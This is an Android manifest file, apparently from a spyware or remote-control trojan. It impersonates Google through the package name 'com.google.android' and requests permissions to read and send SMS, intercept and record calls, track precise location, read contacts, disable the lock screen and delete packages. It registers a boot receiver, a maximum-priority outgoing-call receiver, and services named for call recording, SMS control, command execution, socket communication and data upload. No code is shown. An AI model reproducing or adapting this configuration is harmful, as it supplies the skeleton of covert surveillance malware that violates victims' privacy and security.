<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.android">
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_GPS"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_UPDATES"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.PERMISSION_NAME"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE"/>
    <uses-permission android:name="android.permission.DEVICE_POWER"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>
    <uses-permission android:name="android.permission.FORCE_STOP_PACKAGES"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <application android:icon="@drawable/icon" android:label="@string/app_name">
        <receiver android:name=".receiver.BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <category android:name="android.intent.category.HOME"/>
            </intent-filter>
            <intent-filter>
                <action android:name="TEST"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".receiver.AlarmReceiver"/>
        <service android:name=".service.MainService"/>
        <service android:name=".service.AlarmService"/>
        <service android:name=".service.SocketService">
            <intent-filter>
                <action android:name="work.service.upinfo"/>
            </intent-filter>
        </service>
        <service android:name=".service.GpsService"/>
        <service android:name=".service.CallRecordService"/>
        <service android:name=".service.CallLogService"/>
        <service android:name=".service.UploadService"/>
        <service android:name=".service.SmsService"/>
        <service android:name=".service.ContactService"/>
        <service android:name=".service.SmsControllerService"/>
        <service android:name=".service.CommandExecutorService"/>
        <service android:name=".service.RegisterService"/>
        <service android:name=".service.CallsListenerService" android:process=":remote"/>
        <service android:name=".service.KeyguardLockService" android:process=":remote"/>
        <service android:name=".service.ScreenService" android:process=":remote"/>
        <activity android:name=".activity.FullScreenActivity" android:theme="@android:style/Theme.NoTitleBar.Fullscreen"/>
        <service android:name=".service.ManualLocalService"/>
        <receiver android:name=".receiver.CallRecordReceiver">
            <intent-filter android:priority="2147483647">
                <category android:name="android.intent.category.DEFAULT"/>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
                <action android:name="android.intent.action.PHONE_STATE"/>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL_FROM_CALLMASTER"/>
            </intent-filter>
        </receiver>
        <service android:name=".service.SyncContactService"/>
    </application>
</manifest>
